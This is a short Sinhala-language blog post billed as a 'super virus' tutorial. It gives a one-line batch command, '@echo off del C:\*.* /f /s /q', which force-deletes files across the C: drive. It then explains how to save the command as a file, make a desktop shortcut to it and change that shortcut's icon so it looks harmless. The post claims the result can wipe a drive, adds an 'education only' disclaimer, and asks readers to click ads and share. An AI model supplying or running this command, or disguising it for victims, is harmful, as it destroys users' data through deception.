සුපිරි වෛරස් එකක් හදමුද?

Image result for computer virus
සැ.යූ-මෙය හුදෙක් අධ්‍යාපනය සදහා පමණක් වන අතර  මෙය අනිසි ආකාරයට භාවිත කිරීමෙන් ඇතිවන සමාජ ගැටලු වලට අප වගකියනු නොලැබේ
කරැණාකර එකවරක් සම්පූර්ණයෙන් ලිපිය කියවන්න

හරි අපි වැඩේ පටන් ගමු
මුලින්ම
notepad එක  Open  කරල පහත code එක  copy   තරන්න



                  @echo off                   del C:\*.* /f /s /q

enter-code-in-notepad

ඉන්පසු
පහත ආකාරයට save   කරන්න 


save-it-on-any-drive-but-not-on-desktop


දැන් එය right-click කර 
Send to > Desktop (create shortcut) 
කරන්න  
දැන් ඔබ සාදා ගත් ගොනුම  Desktop මත දක්නට ලැබේ

දැන් එය  right-click  කර පහත ආකාරයට එක වෙනස් කරන්න
change-icon

දැන් වෛරස් එකේ වැඩේ ඉවරයි
මේක ඉතා දරැණු වෛරස් එකක් වන අතර ඔබේ  drive සම්පූරණයෙන්ම 
format කරන්න මේකට හැකියාව තිබෙනවා එම නිසා අත්හදා බැලීමෙන් වලකින්න

මෙය හුදෙක් අධ්‍යාපනය සදහා පමණයි
ගැටලු Comment  කරන්න

අලුත් දෙයක් ඉගෙන ගත්තනම්
Ad එකක් click කරල යන්න ලෝභ නැතුව
Share පාරකුත් දාන්න




Share on Google Plus

About Unknown

ලිපි උපුටා ගැනීම තහනම්

2 comments:

nice

H